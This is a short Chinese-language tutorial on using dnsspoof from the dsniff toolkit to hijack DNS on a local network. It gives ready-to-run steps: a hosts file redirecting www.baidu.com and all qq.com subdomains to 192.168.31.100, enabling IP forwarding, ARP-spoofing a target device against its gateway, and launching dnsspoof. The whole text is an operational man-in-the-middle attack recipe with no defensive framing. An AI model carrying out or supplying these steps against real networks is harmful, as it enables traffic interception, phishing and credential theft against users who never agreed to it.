dnsspoof 是 dsniff 工具集中一个用于 伪造 DNS 响应包 的工具。它可以让目标设备在访问某个域名时,被引导到你指定的 IP 地址上,从而实现 域名劫持 的效果。
1:准备伪造规则文件
写入以下内容保存为hosts.txt
192.168.31.100 www.baidu.com
192.168.31.100 *.qq.com
- 当目标访问
www.baidu.com或任何qq.com子域名时,都返回192.168.31.100。
2:开启 IP 转发(让数据继续转发,不让目标断网)
sudo sysctl -w net.ipv4.ip_forward=1
3:执行 ARP 欺骗(伪装成网关)
sudo arpspoof -i wlp2s0 -t 192.168.31.76 192.168.31.1
4:启动 dnsspoof
sudo dnsspoof -i wlp2s0 -f hosts.txt